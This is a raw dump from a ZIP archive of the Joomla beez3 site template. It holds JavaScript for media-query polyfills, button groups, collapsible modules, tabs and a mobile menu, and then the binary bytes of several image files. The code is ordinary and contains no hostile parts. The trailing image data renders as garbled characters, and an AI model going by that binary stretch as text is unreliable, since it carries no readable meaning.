/*! NOTE: If you're already including a window.matchMedia polyfill via Modernizr or otherwise, you don't need this part */
window.matchMedia = window.matchMedia || (function(doc, undefined){

  var bool,
      docElem  = doc.documentElement,
      refNode  = docElem.firstElementChild || docElem.firstChild,
      // fakeBody required for <FF4 when executed in <head>
      fakeBody = doc.createElement('body'),
      div      = doc.createElement('div');

  div.id = 'mq-test-1';
  div.style.cssText = "position:absolute;top:-100em";
  fakeBody.style.background = "none";
  fakeBody.appendChild(div);

  return function(q){

    div.innerHTML = '&shy;<style media="'+q+'"> #mq-test-1 { width: 42px; }</style>';

    docElem.insertBefore(fakeBody, refNode);
    bool = div.offsetWidth == 42;
    docElem.removeChild(fakeBody);

    return { matches: bool, media: q };
  };

})(document);




/*! Respond.js v1.1.0: min/max-width media query polyfill. (c) Scott Jehl. MIT/GPLv2 Lic. j.mp/respondjs  */
(function( win ){
	//exposed namespace
	win.respond = {};

	//define update even in native-mq-supporting browsers, to avoid errors
	respond.update = function(){};

	//expose media query support flag for external use
	respond.mediaQueriesSupported = win.matchMedia && win.matchMedia( "only all" ).matches;

	//if media queries are supported, exit here
	if ( respond.mediaQueriesSupported ){ return; }

	//define vars
	var doc            = win.document,
		docElem        = doc.documentElement,
		mediastyles    = [],
		rules          = [],
		appendedEls    = [],
		parsedSheets   = {},
		resizeThrottle = 30,
		head           = doc.getElementsByTagName( "head" )[0] || docElem,
		base           = doc.getElementsByTagName( "base" )[0],
		links          = head.getElementsByTagName( "link" ),
		requestQueue   = [],

		// Loop stylesheets, send text content to translate
		ripCSS         = function(){
			var sheets = links,
				sl     = sheets.length,
				i      = 0,
				// Vars for loop:
				sheet, href, media, isCSS;

			for( ; i < sl; i++ ){
				sheet = sheets[ i ],
				href  = sheet.href,
				media = sheet.media,
				isCSS = sheet.rel && sheet.rel.toLowerCase() === "stylesheet";

				// Only links plz and prevent re-parsing
				if ( !!href && isCSS && !parsedSheets[ href ] ){
					// Selectivizr exposes css through the rawCssText expando
					if (sheet.styleSheet && sheet.styleSheet.rawCssText) {
						translate( sheet.styleSheet.rawCssText, href, media );
						parsedSheets[ href ] = true;
					} else {
						if ( (!/^([a-zA-Z:]*\/\/)/.test( href ) && !base)
							|| href.replace( RegExp.$1, "" ).split( "/" )[0] === win.location.host ){
							requestQueue.push( {
								href: href,
								media: media
							} );
						}
					}
				}
			}
			makeRequests();
		},

		// Recurse through request queue, get css text
		makeRequests = function(){
			if ( requestQueue.length ){
				var thisRequest = requestQueue.shift();

				ajax( thisRequest.href, function( styles ){
					translate( styles, thisRequest.href, thisRequest.media );
					parsedSheets[ thisRequest.href ] = true;
					makeRequests();
				} );
			}
		},

		// Find media blocks in css text, convert to style blocks
		translate       = function( styles, href, media ){
			var qs      = styles.match(  /@media[^\{]+\{([^\{\}]*\{[^\}\{]*\})+/gi ),
				ql      = qs && qs.length || 0,
				// Try to get CSS path
				href    = href.substring( 0, href.lastIndexOf( "/" )),
				repUrls = function( css ){
					return css.replace( /(url\()['"]?([^\/\)'"][^:\)'"]+)['"]?(\))/g, "$1" + href + "$2$3" );
				},
				useMedia = !ql && media,
				// Vars used in loop
				i        = 0,
				j, fullq, thisq, eachq, eql;

			// If path exists, tack on trailing slash
			if ( href.length ){ href += "/"; }

			/* If no internal queries exist, but media attr does, use that
			*  note: this currently lacks support for situations where a media attr is specified on a link AND
			*  its associated stylesheet has internal CSS media queries.
			*  In those cases, the media attribute will currently be ignored.
			*/
			if ( useMedia ){
				ql = 1;
			}


			for( ; i < ql; i++ ){
				j = 0;

				// Media attr
				if ( useMedia ){
					fullq = media;
					rules.push( repUrls( styles ) );
				}
				// Parse for styles
				else{
					fullq = qs[ i ].match( /@media *([^\{]+)\{([\S\s]+?)$/ ) && RegExp.$1;
					rules.push( RegExp.$2 && repUrls( RegExp.$2 ) );
				}

				eachq = fullq.split( "," );
				eql   = eachq.length;

				for( ; j < eql; j++ ){
					thisq = eachq[ j ];
					mediastyles.push( {
						media    : thisq.split( "(" )[ 0 ].match( /(only\s+)?([a-zA-Z]+)\s?/ ) && RegExp.$2 || "all",
						rules    : rules.length - 1,
						hasquery : thisq.indexOf("(") > -1,
						minw     : thisq.match( /\(min\-width:[\s]*([\s]*[0-9\.]+)(px|em)[\s]*\)/ ) && parseFloat( RegExp.$1 ) + ( RegExp.$2 || "" ),
						maxw     : thisq.match( /\(max\-width:[\s]*([\s]*[0-9\.]+)(px|em)[\s]*\)/ ) && parseFloat( RegExp.$1 ) + ( RegExp.$2 || "" )
					} );
				}
			}

			applyMedia();
		},

		lastCall,

		resizeDefer,

		// Returns the value of 1em in pixels
		getEmValue = function() {
			var ret,
				div  = doc.createElement('div'),
				body = doc.body,
				fakeUsed = false;

			div.style.cssText = "position:absolute;font-size:1em;width:1em";

			if ( !body ){
				body = fakeUsed = doc.createElement( "body" );
				body.style.background = "none";
			}

			body.appendChild( div );

			docElem.insertBefore( body, docElem.firstChild );

			ret = div.offsetWidth;

			if ( fakeUsed ){
				docElem.removeChild( body );
			}
			else {
				body.removeChild( div );
			}

			// Also update eminpx before returning
			ret = eminpx = parseFloat(ret);

			return ret;
		},

		// Cached container for 1em value, populated the first time it's needed
		eminpx,

		// Enable/disable styles
		applyMedia          = function( fromResize ){
			var name        = "clientWidth",
				docElemProp = docElem[ name ],
				currWidth   = doc.compatMode === "CSS1Compat" && docElemProp || doc.body[ name ] || docElemProp,
				styleBlocks = {},
				lastLink    = links[ links.length-1 ],
				now         = (new Date()).getTime();

			// Throttle resize calls
			if ( fromResize && lastCall && now - lastCall < resizeThrottle ){
				clearTimeout( resizeDefer );
				resizeDefer = setTimeout( applyMedia, resizeThrottle );
				return;
			}
			else {
				lastCall = now;
			}

			for( var i in mediastyles ){
				var thisstyle = mediastyles[ i ],
					min       = thisstyle.minw,
					max       = thisstyle.maxw,
					minnull   = min === null,
					maxnull   = max === null,
					em        = "em";

				if ( !!min ){
					min = parseFloat( min ) * ( min.indexOf( em ) > -1 ? ( eminpx || getEmValue() ) : 1 );
				}
				if ( !!max ){
					max = parseFloat( max ) * ( max.indexOf( em ) > -1 ? ( eminpx || getEmValue() ) : 1 );
				}

				// If there's no media query at all (the () part), or min or max is not null, and if either is present, they're true
				if ( !thisstyle.hasquery || ( !minnull || !maxnull ) && ( minnull || currWidth >= min ) && ( maxnull || currWidth <= max ) ){
						if ( !styleBlocks[ thisstyle.media ] ){
							styleBlocks[ thisstyle.media ] = [];
						}
						styleBlocks[ thisstyle.media ].push( rules[ thisstyle.rules ] );
				}
			}

			// Remove any existing respond style element(s)
			for( var i in appendedEls ){
				if ( appendedEls[ i ] && appendedEls[ i ].parentNode === head ){
					head.removeChild( appendedEls[ i ] );
				}
			}

			// Inject active styles, grouped by media type
			for( var i in styleBlocks ){
				var ss  = doc.createElement( "style" ),
					css = styleBlocks[ i ].join( "\n" );

				ss.type  = "text/css";
				ss.media = i;

				// Originally, ss was appended to a documentFragment and sheets were appended in bulk.
				// This caused crashes in IE in a number of circumstances, such as when the HTML element had a bg image set, so appending beforehand seems best. Thanks to @dvelyk for the initial research on this one!
				head.insertBefore( ss, lastLink.nextSibling );

				if ( ss.styleSheet ){
					ss.styleSheet.cssText = css;
				}
				else {
					ss.appendChild( doc.createTextNode( css ) );
				}

				// Push to appendedEls to track for later removal
				appendedEls.push( ss );
			}
		},
		// Tweaked Ajax functions from Quirksmode
		ajax = function( url, callback ) {
			var req = xmlHttp();
			if (!req){
				return;
			}
			req.open( "GET", url, true );
			req.onreadystatechange = function () {
				if ( req.readyState != 4 || req.status != 200 && req.status != 304 ){
					return;
				}
				callback( req.responseText );
			}
			if ( req.readyState == 4 ){
				return;
			}
			req.send( null );
		},
		// Define ajax obj
		xmlHttp = (function() {
			var xmlhttpmethod = false;
			try {
				xmlhttpmethod = new XMLHttpRequest();
			}
			catch( e ){
				xmlhttpmethod = new ActiveXObject( "Microsoft.XMLHTTP" );
			}
			return function(){
				return xmlhttpmethod;
			};
		})();

	// Translate CSS
	ripCSS();

	// Expose update for re-running respond later on
	respond.update = ripCSS;

	// Adjust on resize
	function callMedia(){
		applyMedia( true );
	}
	if ( win.addEventListener ){
		win.addEventListener( "resize", callMedia, false );
	}
	else if( win.attachEvent ){
		win.attachEvent( "onresize", callMedia );
	}
})(this);
PK՜�\�|��beez3/javascript/template.jsnu�[���/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 * @copyright   (C) 2013 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 * @since       3.2
 */

jQuery(function($) {
	'use strict';

	$(document).on('click', ".btn-group label:not(.active)", function() {
			var $label = $(this);
			var $input = $(document.getElementById($label.attr('for')));

			if ($input.prop('checked'))
			{
				return;
			}

			$label.closest('.btn-group').find("label").removeClass('active btn-success btn-danger btn-primary');

			var btnClass = 'primary';

			if ($input.val() != '')
			{
				var reversed = $label.closest('.btn-group').hasClass('btn-group-reversed');
				btnClass = ($input.val() == 0 ? !reversed : reversed) ? 'danger' : 'success';
			}

			$label.addClass('active btn-' + btnClass);
			$input.prop('checked', true).trigger('change');
		})
		.on('subform-row-add', initButtonGroup)
		.on('subform-row-add', initTooltip);

	initButtonGroup();
	initTooltip();

	// Called once on domready, again when a subform row is added
	function initTooltip(event, container)
	{
		$(container || document).find('*[rel=tooltip]').tooltip();
	}

	// Called once on domready, again when a subform row is added
	function initButtonGroup(event, container)
	{
		var $container = $(container || document);

		// Turn radios into btn-group
		$container.find('.radio.btn-group label').addClass('btn');

		// Setup coloring for buttons
		$container.find('.btn-group input:checked').each(function() {
			var $input  = $(this);
			var $label = $(document.querySelector('label[for=' + $input.attr('id') + ']'));
			var btnClass = 'primary';

			if ($input.val() != '')
			{
				var reversed = $input.parent().hasClass('btn-group-reversed');
				btnClass = ($input.val() == 0 ? !reversed : reversed) ? 'danger' : 'success';
			}

			$label.addClass('active btn-' + btnClass);
		});
	}
});
PK՜�\�~�""beez3/javascript/hide.jsnu�[���// Angie Radtke 2009 - 2012  thanks to daniel //

/*global window, localStorage, Cookie, altopen, altclose, big, small, rightopen, rightclose, bildauf, bildzu */

function saveIt(name) {
	var x = document.getElementById(name).style.display;

	if (!x) {
		alert('No cookie available');
	} else if (localStorage) {
		localStorage[name] = x;
	}
}

function readIt(name) {
	if (localStorage) {
		return localStorage[name];
	}
}

function wrapperwidth(width) {
	jQuery('#wrapper').css('width', width);
}

// add Wai-Aria landmark-roles
jQuery(function($) {
	$('#nav').attr('role', 'navigation');
	$('input[id^="mod-search-searchword"]').closest('form').attr('role', 'search');
	$('#main').attr('role', 'main');
	$('#right').attr('role', 'contentinfo');
});

jQuery(function($) {
		// get ankers
		var $myankers = $('a.opencloselink');
		$myankers.each(function() {
			var $element = $(this);
			$element.attr('role', 'tab');
			var myid = $element.attr('id');
			myid = myid.split('_');
			myid = 'module_' + myid[1];
			$element.attr('aria-controls', myid);
		});

		var $list = $('div.moduletable_js');
		$list.each(function() {
			var $element = $(this);
			if ($element.find('div.module_content').length) {
				var $el = $element.find('div.module_content');
				$el.attr('role', 'tabpanel');
				var myid = $el.attr('id');
				myid = myid.split('_');
				myid = 'link_' + myid[1];
				$el.attr('aria-labelledby', myid);
				var myclass = $el.attr('class');
				var one = myclass.split(' ');
				// search for active menu-item
				var $listelement = $el.find('a.active').first();
				var unique = $el.attr('id');
				var nocookieset = readIt(unique);
				if (($listelement.length) || ((one[1] == 'open') && (nocookieset == null))) {
					$el.show();
					var $eltern = $el.parent();
					var $elternh = $eltern.find('h3').first();
					var $elternbild = $eltern.find('img').first();
					$elternbild.attr('alt', altopen).attr('src', bildzu);
					$elternbild.focus();
				} else {
					$el.hide();
					$el.attr('aria-expanded', 'false');
				}

				unique = $el.attr('id');
				var cookieset = readIt(unique);
				if (cookieset === 'block') {
					$el.show();
					$el.attr('aria-expanded', 'true');
				}

			}
		});
	});

jQuery(function($) {
	var $what = $('#right');
	// if rightcolumn
	if ($what.length) {
		var whatid = $what.attr('id');
		var rightcookie = readIt(whatid);
		if (rightcookie === 'none') {
			$what.hide();
			$('#nav').addClass('leftbigger');
			wrapperwidth(big);
			var $grafik = $('#bild');
			$grafik.html(rightopen);
			$grafik.focus();
		}
	}
});

function auf(key) {
	var $ = jQuery.noConflict();
	var $el = $('#' + key);

	if (!$el.is(':visible')) {
		$el.show();
		$el.attr('aria-expanded', 'true');

		if (key !== 'right') {
			$el.hide().toggle('slide');
			$el.parent().attr('class', 'slide');
			$eltern = $el.parent().parent();
			$elternh = $eltern.find('h3').first();
			$elternh.addClass('high');
			$elternbild = $eltern.find('img').first();
			$el.focus();
			$elternbild.attr('alt', altopen).attr('src', bildzu);
		}

		if (key === 'right') {
			$('#right').show();
			wrapperwidth(small);
			$('#nav').removeClass('leftbigger');
			$grafik = $('#bild');
			$('#bild').html(rightclose);
			$grafik.focus();
		}
	} else {
		$el.hide();
		$el.attr('aria-expanded', 'false');

		$el.removeClass('open');

		if (key !== 'right') {
			$eltern = $el.parent().parent();
			$elternh = $eltern.find('h3').first();
			$elternh.removeClass('high');
			$elternbild = $eltern.find('img').first();
			$elternbild.attr('alt', altclose).attr('src', bildauf);
			$elternbild.focus();
		}

		if (key === 'right') {
			$('#right').hide();
			wrapperwidth(big);
			$('#nav').addClass('leftbigger');
			$grafik = $('#bild');
			$grafik.html(rightopen);
			$grafik.focus();
		}
	}
	// write cookie
	saveIt(key);
}

// ########### Tabfunctions ####################

jQuery(function($) {
	var $alldivs = $('div.tabcontent');
	var $outerdivs = $('div.tabouter');
	//outerdivs = outerdivs.getProperty('id');

	$outerdivs.each(function() {
		var $alldivs = $(this).find('div.tabcontent');
		var count = 0;
		var countankers = 0;
		$alldivs.each(function() {
		var $el = $(this);
			count++;
			$el.attr('role', 'tabpanel');
			$el.attr('aria-hidden', 'false');
			$el.attr('aria-expanded', 'true');
			elid = $el.attr('id');
			elid = elid.split('_');
			elid = 'link_' + elid[1];
			$el.attr('aria-labelledby', elid);

			if (count !== 1) {
				$el.addClass('tabclosed').removeClass('tabopen');
				$el.attr('aria-hidden', 'true');
				$el.attr('aria-expanded', 'false');
			}
		});

		$allankers = $(this).find('ul.tabs').first().find('a');

		$allankers.each(function() {
			countankers++;
			var $el = $(this);
			$el.attr('aria-selected', 'true');
			$el.attr('role', 'tab');
			linkid = $el.attr('id');
			moduleid = linkid.split('_');
			moduleid = 'module_' + moduleid[1];
			$el.attr('aria-controls', moduleid);

			if (countankers != 1) {
				$el.addClass('linkclosed').removeClass('linkopen');
				$el.attr('aria-selected', 'false');
			}
		});
	});
});

function tabshow(elid) {
	var $ = jQuery.noConflict();
	var $el = $('#' + elid);
	var $outerdiv = $el.parent();

	var $alldivs = $outerdiv.find('div.tabcontent');
	var $liste = $outerdiv.find('ul.tabs').first();

	$liste.find('a').attr('aria-selected', 'false');

	$alldivs.each(function() {
		var $element = $(this);
		$element.addClass('tabclosed').removeClass('tabopen');
		$element.attr('aria-hidden', 'true');
		$element.attr('aria-expanded', 'false');
	});

	$el.addClass('tabopen').removeClass('tabclosed');
	$el.attr('aria-hidden', 'false');
	$el.attr('aria-expanded', 'true');
	$el.focus();
	var getid = elid.split('_');
	var activelink = '#link_' + getid[1];
	$(activelink).attr('aria-selected', 'true');
	$liste.find('a').addClass('linkclosed').removeClass('linkopen');
	$(activelink).addClass('linkopen').removeClass('linkclosed');
}

function nexttab(el) {
	var $ = jQuery.noConflict();
	var $outerdiv = $('#' + el).parent();
	var $liste = $outerdiv.find('ul.tabs').first();
	var getid = el.split('_');
	var activelink = '#link_' + getid[1];
	var aktiverlink = $(activelink).attr('aria-selected');
	var $tablinks = $liste.find('a');

	for (var i = 0; i < $tablinks.length; i++) {
		if ($($tablinks[i]).attr('id') === activelink) {
			if ($($tablinks[i + 1]).length) {
				$($tablinks[i + 1]).click();
				break;
			}
		}
	}
}

// mobilemenuheader
var mobileMenu = function(){

	var $ = jQuery.noConflict(), displayed = false, $mobile, $menu, $menuWrapper;

	var getX = function() {
		return $(document).width();
	};

	var createElements = function () {
		var Openmenu=Joomla.JText._('TPL_BEEZ3_OPENMENU');
		var Closemenu=Joomla.JText._('TPL_BEEZ3_CLOSEMENU');
		$menu = $("#header").find('ul.menu').first();
		$menuWrapper = $('<div>', {id : 'menuwrapper', role: 'menubar'});

		// create the menu opener and assign events
		$mobile = $('<div>', {id: 'mobile_select'}).html('<h2><a href="#" id="menuopener" onclick="return false;"><span>'+Openmenu+'</span></a></h2>').show();
		$mobile.on('click', function(){
			var state = $menuWrapper.css('display');
			$menuWrapper.slideToggle();

			if (state === 'none') {
				$('#menuopener').html(Closemenu);
				$('#menuwrapper').attr('aria-expanded', 'true').attr('aria-hidden','false');
			} else {
				$('#menuopener').html(Openmenu);
				$('#menuwrapper').attr('aria-expanded', 'false').attr('aria-hidden', 'true');
			}
		});

		// add the menu to the dom
		$menu.wrap($menuWrapper);

		// add the menuopener to the dom and hide it
		$('#header').find('#menuwrapper').first().before($mobile.hide());
		$menuWrapper = $('#menuwrapper');
		$mobile = $('#mobile_select');

	};
	var display = function () {
		$menuWrapper.hide();
		$mobile.show();
		displayed = true;
	};

	var initialize = function () {
		// create the elements once
		createElements();

		// show the elements if the browser size is smaller
		if (getX() <= 461 && !displayed) {
			display();
		}

		// react on resize events
		$(window).on('resize', function () {
			if (getX() >= 461) {
				if (displayed) {
					$mobile.hide();
					$('#menuwrapper').show();
					displayed = false;
				}
			}
			if (getX() < 461) {
				if (!displayed) {
					display();
				}

			}
		});
	};

	initialize();
};

jQuery(function () {
	new mobileMenu();
});



//For discussion and comments, see: http://remysharp.com/2009/01/07/html5-enabling-script/
(function(){if(!/*@cc_on!@*/0)return;var e = "abbr,article,aside,audio,canvas,datalist,details,eventsource,figure,footer,header,hgroup,mark,menu,meter,nav,output,progress,section,time,video".split(','),i=e.length;while(i--){document.createElement(e[i])}})()

PK՜�\j��	%	%beez3/javascript/respond.src.jsnu�[���/*! matchMedia() polyfill - Test a CSS media type/query in JS. Authors & copyright (c) 2012: Scott Jehl, Paul Irish, Nicholas Zakas. Dual MIT/BSD license */
/*! NOTE: If you're already including a window.matchMedia polyfill via Modernizr or otherwise, you don't need this part */
window.matchMedia = window.matchMedia || (function(doc, undefined){

  var bool,
      docElem  = doc.documentElement,
      refNode  = docElem.firstElementChild || docElem.firstChild,
      // fakeBody required for <FF4 when executed in <head>
      fakeBody = doc.createElement('body'),
      div      = doc.createElement('div');

  div.id = 'mq-test-1';
  div.style.cssText = "position:absolute;top:-100em";
  fakeBody.style.background = "none";
  fakeBody.appendChild(div);

  return function(q){

    div.innerHTML = '&shy;<style media="'+q+'"> #mq-test-1 { width: 42px; }</style>';

    docElem.insertBefore(fakeBody, refNode);
    bool = div.offsetWidth == 42;
    docElem.removeChild(fakeBody);

    return { matches: bool, media: q };
  };

})(document);




/*! Respond.js v1.1.0: min/max-width media query polyfill. (c) Scott Jehl. MIT/GPLv2 Lic. j.mp/respondjs  */
(function( win ){
	// Exposed namespace
	win.respond = {};

	// Define update even in native-mq-supporting browsers, to avoid errors
	respond.update = function(){};

	// Expose media query support flag for external use
	respond.mediaQueriesSupported = win.matchMedia && win.matchMedia( "only all" ).matches;

	// If media queries are supported, exit here
	if ( respond.mediaQueriesSupported ){ return; }

	// Define vars
	var doc            = win.document,
		docElem        = doc.documentElement,
		mediastyles    = [],
		rules          = [],
		appendedEls    = [],
		parsedSheets   = {},
		resizeThrottle = 30,
		head           = doc.getElementsByTagName( "head" )[0] || docElem,
		base           = doc.getElementsByTagName( "base" )[0],
		links          = head.getElementsByTagName( "link" ),
		requestQueue   = [],

		// Loop stylesheets, send text content to translate
		ripCSS = function(){

			var sheets = links,
				sl     = sheets.length,
				i      = 0,
				// Vars for loop:
				sheet, href, media, isCSS;

			for( ; i < sl; i++ ){
				sheet = sheets[ i ],
				href  = sheet.href,
				media = sheet.media,
				isCSS = sheet.rel && sheet.rel.toLowerCase() === "stylesheet";

				//only links plz and prevent re-parsing
				if ( !!href && isCSS && !parsedSheets[ href ] ){
					// selectivizr exposes css through the rawCssText expando
					if (sheet.styleSheet && sheet.styleSheet.rawCssText) {
						translate( sheet.styleSheet.rawCssText, href, media );
						parsedSheets[ href ] = true;
					} else {

						if ( (!/^([a-zA-Z:]*\/\/)/.test( href ) && !base)
							|| href.replace( RegExp.$1, "" ).split( "/" )[0] === win.location.host ){
							requestQueue.push( {
								href: href,
								media: media
							} );
						}
					}
				}
			}
			makeRequests();
		},

		// Recurse through request queue, get css text
		makeRequests = function(){

			if ( requestQueue.length ){
				var thisRequest = requestQueue.shift();

				ajax( thisRequest.href, function( styles ){

					translate( styles, thisRequest.href, thisRequest.media );
					parsedSheets[ thisRequest.href ] = true;
					makeRequests();
				} );
			}
		},

		// Find media blocks in css text, convert to style blocks
		translate       = function( styles, href, media ){
			var qs      = styles.match(  /@media[^\{]+\{([^\{\}]*\{[^\}\{]*\})+/gi ),
				ql      = qs && qs.length || 0,
				// Try to get CSS path
				href    = href.substring( 0, href.lastIndexOf( "/" )),
				repUrls = function( css ){
					return css.replace( /(url\()['"]?([^\/\)'"][^:\)'"]+)['"]?(\))/g, "$1" + href + "$2$3" );
				},
				useMedia = !ql && media,
				// Vars used in loop
				i        = 0,
				j, fullq, thisq, eachq, eql;

			// If path exists, tack on trailing slash
			if ( href.length ){ href += "/"; }

			//if no internal queries exist, but media attr does, use that
			//note: this currently lacks support for situations where a media attr is specified on a link AND
				//its associated stylesheet has internal CSS media queries.
				//In those cases, the media attribute will currently be ignored.
			if ( useMedia ){
				ql = 1;
			}

			for( ; i < ql; i++ ){
				j = 0;

				// Media attr
				if ( useMedia ){
					fullq = media;
					rules.push( repUrls( styles ) );
				}
				// Parse for styles
				else{
					fullq = qs[ i ].match( /@media *([^\{]+)\{([\S\s]+?)$/ ) && RegExp.$1;
					rules.push( RegExp.$2 && repUrls( RegExp.$2 ) );
				}

				eachq = fullq.split( "," );
				eql   = eachq.length;

				for( ; j < eql; j++ ){
					thisq = eachq[ j ];
					mediastyles.push( {
						media    : thisq.split( "(" )[ 0 ].match( /(only\s+)?([a-zA-Z]+)\s?/ ) && RegExp.$2 || "all",
						rules    : rules.length - 1,
						hasquery : thisq.indexOf("(") > -1,
						minw     : thisq.match( /\(min\-width:[\s]*([\s]*[0-9\.]+)(px|em)[\s]*\)/ ) && parseFloat( RegExp.$1 ) + ( RegExp.$2 || "" ),
						maxw     : thisq.match( /\(max\-width:[\s]*([\s]*[0-9\.]+)(px|em)[\s]*\)/ ) && parseFloat( RegExp.$1 ) + ( RegExp.$2 || "" )
					} );
				}
			}

			applyMedia();
		},

		lastCall,

		resizeDefer,

		// returns the value of 1em in pixels
		getEmValue = function() {
			var ret,
				div      = doc.createElement('div'),
				body     = doc.body,
				fakeUsed = false;

			div.style.cssText = "position:absolute;font-size:1em;width:1em";

			if ( !body ){
				body = fakeUsed = doc.createElement( "body" );
				body.style.background = "none";
			}

			body.appendChild( div );

			docElem.insertBefore( body, docElem.firstChild );

			ret = div.offsetWidth;

			if ( fakeUsed ){
				docElem.removeChild( body );
			}
			else {
				body.removeChild( div );
			}

			// Also update eminpx before returning
			ret = eminpx = parseFloat(ret);

			return ret;
		},

		// Cached container for 1em value, populated the first time it's needed
		eminpx,

		// Enable/disable styles
		applyMedia          = function( fromResize ){
			var name        = "clientWidth",
				docElemProp = docElem[ name ],
				currWidth   = doc.compatMode === "CSS1Compat" && docElemProp || doc.body[ name ] || docElemProp,
				styleBlocks = {},
				lastLink    = links[ links.length-1 ],
				now         = (new Date()).getTime();

			// Throttle resize calls
			if ( fromResize && lastCall && now - lastCall < resizeThrottle ){
				clearTimeout( resizeDefer );
				resizeDefer = setTimeout( applyMedia, resizeThrottle );
				return;
			}
			else {
				lastCall = now;
			}

			for( var i in mediastyles ){
				var thisstyle = mediastyles[ i ],
					min = thisstyle.minw,
					max = thisstyle.maxw,
					minnull = min === null,
					maxnull = max === null,
					em = "em";

				if ( !!min ){
					min = parseFloat( min ) * ( min.indexOf( em ) > -1 ? ( eminpx || getEmValue() ) : 1 );
				}
				if ( !!max ){
					max = parseFloat( max ) * ( max.indexOf( em ) > -1 ? ( eminpx || getEmValue() ) : 1 );
				}

				// If there's no media query at all (the () part), or min or max is not null, and if either is present, they're true
				if ( !thisstyle.hasquery || ( !minnull || !maxnull ) && ( minnull || currWidth >= min ) && ( maxnull || currWidth <= max ) ){
						if ( !styleBlocks[ thisstyle.media ] ){
							styleBlocks[ thisstyle.media ] = [];
						}
						styleBlocks[ thisstyle.media ].push( rules[ thisstyle.rules ] );
				}
			}

			// Remove any existing respond style element(s)
			for( var i in appendedEls ){
				if ( appendedEls[ i ] && appendedEls[ i ].parentNode === head ){
					head.removeChild( appendedEls[ i ] );
				}
			}

			// Inject active styles, grouped by media type
			for( var i in styleBlocks ){
				var ss  = doc.createElement( "style" ),
					css = styleBlocks[ i ].join( "\n" );

				ss.type  = "text/css";
				ss.media = i;

				// Originally, ss was appended to a documentFragment and sheets were appended in bulk.
				// This caused crashes in IE in a number of circumstances, such as when the HTML element had a bg image set, so appending beforehand seems best. Thanks to @dvelyk for the initial research on this one!
				head.insertBefore( ss, lastLink.nextSibling );

				if ( ss.styleSheet ){
					ss.styleSheet.cssText = css;
				}
				else{
					ss.appendChild( doc.createTextNode( css ) );
		        }

				// Push to appendedEls to track for later removal
				appendedEls.push( ss );
			}
		},
		// Tweaked Ajax functions from Quirksmode
		ajax = function( url, callback ) {
			var req = xmlHttp();
			if (!req){
				return;
			}
			req.open( "GET", url, true );
			req.onreadystatechange = function () {
				if ( req.readyState != 4 || req.status != 200 && req.status != 304 ){
					return;
				}
				callback( req.responseText );
			}
			if ( req.readyState == 4 ){
				return;
			}
			req.send( null );
		},
		// Define ajax obj
		xmlHttp = (function() {
			var xmlhttpmethod = false;
			try {
				xmlhttpmethod = new XMLHttpRequest();
			}
			catch( e ){
				xmlhttpmethod = new ActiveXObject( "Microsoft.XMLHTTP" );
			}
			return function(){
				return xmlhttpmethod;
			};
		})();

	// Translate CSS
	ripCSS();

	// Expose update for re-running respond later on
	respond.update = ripCSS;

	// Adjust on resize
	function callMedia(){
		applyMedia( true );
	}
	if ( win.addEventListener ){
		win.addEventListener( "resize", callMedia, false );
	}
	else if( win.attachEvent ){
		win.attachEvent( "onresize", callMedia );
	}
})(this);
PK՜�\Q�kV}}beez3/images/req.pngnu�[����PNG


IHDR�7uQrPLTE������:=?�����ʷ�������͠�������������眛���������ݣ����������������ӕ�������⢡������kln��������״������������_�IDATx^��W�0P�\ҝ��W�8�0��F#keq�VI�
�Ъ�CbY�<�ܔ2~�h�-PE�VK�Zh�c�W�S�aTD�ո�?Djx-gI���~K$�I�2u�>F9��Br�$�N�n�ݙhL�t��SgD���$�
x��ty�Q�}*�>���~n�c�5��8kl�Κ��ʿ���_��
	�0�11�&IEND�B`�PK՜�\e.��}}beez3/images/plus.pngnu�[����PNG


IHDR�ʖDIDATxc�pu�68t��ի�������^�m��jQ|c �S�=�0�w�>�������ޫ}g�y#��IEND�B`�PK՜�\2Gs%%beez3/images/trans.gifnu�[���GIF89ap!�,@D;PK՜�\��[[%beez3/images/personal/arrow2_grey.jpgnu�[������JFIFdd�����		��W	
	��?��e�_���h&o�w��v��2�ɔ���28��a��d�$�ޤ�]�_�d)��V!����m�VX��PK՜�\k�e~�� beez3/images/personal/button.pngnu�[����PNG


IHDR~@S1T�IDATx�щ�� `�eq�n���1L(Ӻ+�s�k�t�Gh'�~��ږ��w޶�`��t���j0�)Щڦ����B�V�<��ˎ� ��{���;̈́����e�*i�^����κ��oB�U��y*��ܭ��U�)
���EUq���t�6G�p���y�ET���P!1���a��Ǒ L��դy��0R �#v��|�~�$�}W�j��P�Y��A�{ꡚ%�H9�AeA�B���t��N�d�w��������4���-�F�VT�E�*΍��+�:�;gS��:c��V��G���j�Z
���Fmv}��DZ_|d��>���s�w�̂�JY�/ViI��LXb��3T��<3p�9�LmF�"�����RK�6el¢Z�	ls�(kLB�X	eƑ��� �L��J�"�̬oF/��+_&5(�XDf�Q��X�T�o/��:�Ak����k`ΤM~q>��7:�����u����8e�o	f���~e�#��e��X�s���߶���`f�����!����7�Fx��	��e8�y�����_~�%�.~����W�M �&C��\��ܗ�^�5)��������_P��[2�g������6^(^=>:fY�e�
��:�ďw٪s�R�3�F�O頩w+�'W=�G�:ͰL#sd�:ߟ��*���I9�<MB���Q���gү�5�^�\3z��uD���tb�����5�4���ZD������Ra���[b^���'��L� ����>��sƘ0>HE�)Ӏ����3�gT�6p�c!39�!;.��35��;�|߈�0�x4���b�>���9k���38��428��r�ǣ����3*�?��o���8!Cz���e�ͤ޶���/s]�\M�B�
c`�lJ��j�k�_ҷ~��n�>v�#��o�Zf�4j�uZ�c[T¥m���%���p� �1$��{k���[���MJ���������5I���<�6��ݚH��5	-���K��Z&�a�:~uE_��i�8�t�U3�'�����5^�I�Ӏ�����u]I}��]�CMUɰT����S�y�+q��3m�����o�PT
U�a*�����Π���[R��J���0��'j�B<�E�m��o��64[�`޵�5B�'1�Ud���.����@uB��xt��1j��C� ����I�8fEfi)������[���2��v8��IӘ�?�1Z�ޜxD�/�hsye�O��d��aJ���o���O�ӻϟ��U�{xh�)O���в%3��TE�7�;�6�7Nn�=�����ѻ[wo���5b�*:Gc����.Oo��?ѯ��.�W�2m�*)�͇�gʇw��##�Ь��ڤ��K;��汌`�f�@�nA\A43��H{�k$F�&��� *�ExŮM���7��Y�O[D��O9��ޛJ/�d�㹳�x(�+i����^�����$�i�k�Gy�!�[-�=+�~�|t�V3fG��)�{jG��c�n�(����}ݨLby���xQ�k���|B'�σ_�X!X)�Wv9���E�B��\�]hCS��+y�)^n��O��kΰW
